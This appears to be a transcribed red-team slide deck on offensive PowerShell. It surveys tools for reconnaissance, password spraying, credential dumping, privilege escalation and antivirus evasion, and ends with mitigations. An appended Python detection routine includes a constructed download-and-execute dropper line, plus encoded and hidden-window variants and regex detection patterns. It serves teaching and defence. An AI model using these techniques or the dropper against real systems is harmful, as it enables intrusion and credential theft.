This document provides an overview of using PowerShell for offensive security purposes. It discusses PowerShell syntax, common commands, and various open source tools and frameworks like PowerSploit, Empire, BloodHound, and Nishang that can be used for tasks like reconnaissance, gaining access, maintaining access, and privilege escalation on Windows systems. The document also provides examples of using PowerShell to bypass execution policies and obfuscate scripts to avoid detection.
2. PS C:> whoami.ps1_
• Arthur Paixão
• Red Team Security Specialist – C6 Bank
• Information Security - UNIFG
• Analysis Systems Development – UNIBRATEC
• Made in Recife #Oxem? #TuVisse?
• Security Research at #RTFM
4. PS C:> overview.ps1_
Why use PowerShell?
• Native on Windows
• .NET Framework
• Easy to learn
• Execute code in memory
• Command-line shell and script
• PowerShell ISE
8. PS C:> syntax-overview.ps1_
Basic Cmdlets
PowerShell      PowerShell Alias    CMD             *nix
Get-ChildItem   ls, gci, dir        dir             ls
Copy-Item       cp, copy, cpi       copy            cp
Move-Item       move, mv, mi        move            mv
Select-String   sls                 find, findstr   grep
Get-Help        man, help           help            man
Get-Content     cat, gcc, type      type            cat
9. PS C:> syntax-overview.ps1_
• New-: Creates a new resource
• Set-: Modifies an existing resource
• Get-: Retrieves an existing resource
• Read-: Gets information from a source, such as a file
• Find-: Used to look for an object
• Search-: Used to create a reference to a resource
• Start-: (asynchronous) begins an operation, such as starting a process
• Invoke-: (synchronous) performs an operation, such as running a command
10. PS C:> syntax-overview.ps1_
Get-Help: the default output isn't really useful; ask for the examples or the full help instead:
Get-Help ls -Examples
Get-Help ls -Full
Get-Command: very useful for finding a cmdlet:
Get-Command Get-Help
Get-Command Set-Acl
14. PS C:> Get-Help-RedTeam.ps1_
• PowerShell is what the admins use to manage their infrastructure;
• Standard on Windows 7 and up;
• Microsoft is pushing more and more tasks into PowerShell;
• PowerShell can be used in every part of the attack lifecycle;
• Access to entire .NET and WMI frameworks;
• Lots of very interesting offensive projects going on;
15. PS C:> Get-Help-BlueTeam.ps1_
• It's what the bad guys (Red Teams) are using;
• There's some really cool DFIR stuff going on with PowerShell;
• Module Logging (v3);
• Script Block Logging (v5);
• Full Transcription Logging (v2, improved in v5);
• Preventing and monitoring downgrade attacks;
• Monitor and alert on certain strings/commands in the command line arguments of powershell.exe:
• -EncodedCommand
• (New-Object Net.WebClient).DownloadString
19. PS C:> PSNmap.ps1_
• Linux nmap for PowerShell (almost).
• Ping sweeps and scans a network for specified open ports.
• Can also perform DNS lookups.
• Author(s):
• @joakimbs
• https://www.powershellgallery.com/packages/PSnmap/1.2
20. PS C:> PowerMeta.ps1_
• Discover publicly available files
• Extract metadata from them
• Can provide information about:
• The internal username schema
• System names
• Domain info
• Author(s):
• Beau Bullock (@dafthack)
• https://github.com/dafthack/PowerMeta
[Screenshot labels: Full Names, Possible Username]
21. PS C:> OWAAttackFlow.ps1_
Starting with nothing and 100% remote:
• Reconnaissance
• OWA target acquisition
• Internal domain enumeration
• Username convention discovery
• Username enumeration
• Password spraying
• Acquire Global Address List
• More password spraying
• 2FA bypass to search email
• Congratulations, now you're H4ck3R!!!
22. PS C:> MailSniper.ps1_
• Enumerate users/domain
• Password spray OWA/EWS
• Get Global Address List
• Search email for certain terms
• Passwords
• Find VPN info
• Reset 2FA keys or add new device
• Author(s):
• Beau Bullock (@dafthack)
• https://github.com/dafthack/MailSniper
24. PS C:> PowerShell-Empire.ps1_
• PowerShell post-exploitation agent
• Aims to provide a rapidly extensible platform to integrate offensive/defensive PowerShell work
• Many capabilities:
• Stagers/payloads, lateral movement, persistence, etc.
• Author(s):
• Will Schroeder (@harmj0y)
• Justin Warner (@sixdub)
• Matt Nelson (@enigma0x3)
• www.powershellempire.com
25. PS C:> LuckyStrike.ps1_
• PowerShell-based generator of malicious .doc and .xls documents;
• All payloads are saved into a database for easy retrieval and embedding into a new or existing document;
• A menu-driven PowerShell script that uses a SQLite database to store your payloads, code block dependencies, and working sessions in order to generate malicious documents.
• Author(s):
• Jason Lang (@curi0usJack)
• https://github.com/curi0usJack/luckystrike
29. PS C:> PowerUp.ps1_
• Performs a number of local privilege escalation checks
• Checks for:
• Unquoted service paths
• Unattended Install Files
• Service Permissions
• Author(s):
• Will Schroeder (@harmj0y)
• https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
30. PS C:> PowerUpSQL.ps1_
• SQL server discovery
• Audit weak configurations
• Perform privilege escalation to obtain SA privileges
• Find sensitive data at scale
• Attack functions:
• Invoke-SQLDumpInfo
• Invoke-SQLAudit
• Invoke-SQLEscalatePriv
• Author(s):
• Scott Sutherland (@_nullbind)
• https://github.com/NetSPI/PowerUpSQL
32. PS C:> Get-GPPPassword.ps1_
• Finds any passwords of accounts set by GPP
• Usually the first thing I check
• Almost always find an admin password here
• Author(s):
• Chris Campbell (@obscuresec)
• https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1
33. PS C:> BloodHound.ps1_
• Enumerates/gathers:
• Local admins group on all systems
• Active user sessions on each system
• Group membership information
• Domain trusts info
• Find a path to domain admin
• Author(s):
• Andrew Robbins (@_wald0), Will Schroeder (@harmj0y) and Rohan Vazarkar (@CptJesus)
• https://github.com/BloodHoundAD/BloodHound
• https://github.com/SadProcessor/SomeStuff/blob/master/BloodHoundw64_LTI.ps1 [Windows Edition]
34. PS C:> Find-LocalAdminAccess.ps1_
• Find a system on the network your user is a local admin of;
• Author(s):
• Will Schroeder (@harmj0y)
• https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
35. PS C:> DomainPasswordSpray.ps1_
• Tool for password spraying all domain users
• Common scenario:
• Domain locks out accounts after a certain number of failed logins
• Can't brute force
• Solution:
• Try a number of passwords lower than the domain lockout threshold against EVERY account in the domain
• Author(s):
• Beau Bullock (@dafthack)
• https://github.com/dafthack/DomainPasswordSpray
37. PS C:> Invoke-Mimikatz.ps1_
• Dump cleartext credentials
• Avoids writing to disk
• Could sneakily dump creds from LSASS dumps from other systems
• Author(s):
• Joe Bialek (@JosephBialek)
• Benjamin Delpy (@gentilkiwi)
• https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
38. PS C:> Invoke-ShareFinder.ps1_
• Sensitive files on shares?
• ShareFinder, then FileFinder
• FileFinder will find files with the following strings in their name:
• '*pass*', '*sensitive*', '*admin*', '*secret*', '*login*', '*unattend*.xml', '*.vmdk', '*creds*', or '*credential*'
• Author(s):
• Will Schroeder (@harmj0y)
42. PS C:> PowerOps.exe_
• C# application that has many PowerShell scripts built in:
• PowerSploit
• Nishang
• GPPPassword
• Empire
• PowerCat
• Author(s):
• Rui Reis (@fdiskyou)
• https://github.com/fdiskyou/PowerOPS
43. PS C:> PowerShdll.ps1_
• Run PowerShell with DLLs only. Does not require access to powershell.exe, as it uses the PowerShell automation DLLs.
• Requirements:
• .NET v3.5 for DLL mode.
• .NET v2.0 for EXE mode.
• https://github.com/p3nt4/PowerShdll
[Screenshots: DLL mode, EXE mode]
44. PS C:> PowerLessShell.py_
• PowerLessShell relies on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach.
• To add another layer of noise, the payload copies msbuild.exe to a randomly named file and builds the payload using that randomly generated binary.
• You can provide the -knownprocess switch to use a known Windows process name instead of renaming MsBuild.exe to something random.
• https://github.com/Mr-Un1k0d3r/PowerLessShell
48. PS C:> Invoke-BypassExecutionPolicy.ps1_
• Set the ExecutionPolicy for the CurrentUser scope via the Registry
• https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/
• https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-5.1
50. PS C:> S3t-0+‘B’+fu$C4t|0n.ps1_
• Command line args are what most monitoring tools alert on when powershell.exe is run
• 'LeT'+'s'+'ob'+'FusCa'+'te'
• Encode, concatenate, reorder, etc.
• Author(s):
• Daniel Bohannon (@danielbohannon)
• https://github.com/danielbohannon/Invoke-Obfuscation
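Added example (Python; not from the deck or from any tool it lists): a triage routine over constructed powershell.exe command lines that decodes -EncodedCommand arguments (base64 over UTF-16LE, including the -enc/-ec/-e short forms PowerShell accepts) and then flags the Blue Team slide's watch strings (DownloadString, -EncodedCommand) together with the 'LeT'+'s' concatenation trick shown above. The sample lines, the example.invalid host and the detection names are constructed.

```python
import base64
import re

def encode_command(script: str) -> str:
    """Build what PowerShell expects after -EncodedCommand: base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed powershell.exe command lines (as seen in process-creation events); not from the deck.
DROPPER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
SAMPLE_COMMAND_LINES = [
    'powershell.exe -ExecutionPolicy Bypass -NoProfile -Command "Get-Process"',
    'powershell.exe -ep bypass -c "' + DROPPER + '"',
    "powershell.exe -nop -w hidden -enc " + encode_command(DROPPER),
    "powershell.exe -c \"&('LeT'+'s'+'ob'+'FusCa'+'te')\"",
]

# Watch-list strings from the Blue Team slide plus their usual companions.
SUSPICIOUS = [
    ("DownloadString", re.compile(r"Net\.WebClient\)\.DownloadString", re.I)),
    ("IEX", re.compile(r"\bIEX\b|Invoke-Expression", re.I)),
    ("ExecutionPolicy bypass", re.compile(r"-(?:ExecutionPolicy|ep)\s+bypass", re.I)),
    ("hidden window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
]
# -EncodedCommand and the shortened forms PowerShell also accepts (-enc, -ec, -e).
ENC_FLAG = re.compile(r"-(?:enc(?:odedcommand)?|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
# Quote-plus-quote joins such as 'LeT'+'s' are the concatenation trick shown on the slide.
CONCAT = re.compile(r"'\s*\+\s*'")

def decode_encoded_command(cmdline: str):
    """Return the decoded script when the line carries an encoded command, else None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # not base64 / not UTF-16LE: treat as absent
        return None

def analyze(cmdline: str) -> list:
    """Return the names of the detections that fire for one command line, in list order."""
    findings = []
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        findings.append("EncodedCommand")
    # Match against the decoded payload too; otherwise encoding hides every other indicator.
    text = cmdline if decoded is None else cmdline + " " + decoded
    findings += [name for name, pat in SUSPICIOUS if pat.search(text)]
    if len(CONCAT.findall(text)) >= 3:
        findings.append("string concatenation")
    return findings
```

Run `analyze()` over each entry of `SAMPLE_COMMAND_LINES` to see which indicators fire; only the encoded line reveals DownloadString after decoding.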
51. PS C:> ISESteroids.ps1_
• ISESteroids 2.5.1.0 now ships with a PowerShell obfuscator that can scramble your code and make it hard to reverse-engineer;
• To obfuscate a script, simply load the script and choose Tools/Obfuscate;
• A dialog lets you set the level of obfuscation;
• http://www.powertheshell.com/powershell-obfuscator/
53. PS C:> Nishang.ps1_
• Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming.
• Nishang is useful during all phases of penetration testing.
• ActiveDirectory
• Antak - the Webshell
• Backdoor
• Bypass
• Clients
• Escalation
• MITM
• Pivot
• https://github.com/samratashok/nishang
54. PS C:> PowerSploit.ps1_
• PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts:
• Recon / CodeExecution
• ScriptModification
• Persistence
• AntivirusBypass
• Exfiltration
• Mayhem =)
• PrivEsc
• https://github.com/PowerShellMafia/PowerSploit
55. PS C:> PS>Attack.ps1_
• PS>Attack combines some of the best projects in the infosec PowerShell community into a self-contained custom PowerShell console.
• It's designed to make it easy to use PowerShell offensively and to evade antivirus and Incident Response teams.
• Contains over 100 commands for Privilege Escalation, Recon and Data Exfiltration. It does this by including the following modules and commands:
• PowerSploit
• Nishang
• Powercat
• Inveigh
• Invoke-TheHash
• https://github.com/jaredhaight/PSAttack
58. PS C:> Get-Mitigation.ps1_
• Disable: (Possible Bypass!)
• Use AppWhitelisting. (Possible Bypass!)
• Use Sysmon to monitor and alert for System.Management.Automation.dll. (Possible Bypass!)
• Could possibly disable csc.exe compilation tool. (Dangerous!)
• Remove PowerShell v2 and install PowerShell v5.
• Constrained Language Mode:
PS C:> $ExecutionContext.SessionState.LanguageMode = "ConstrainedLanguage"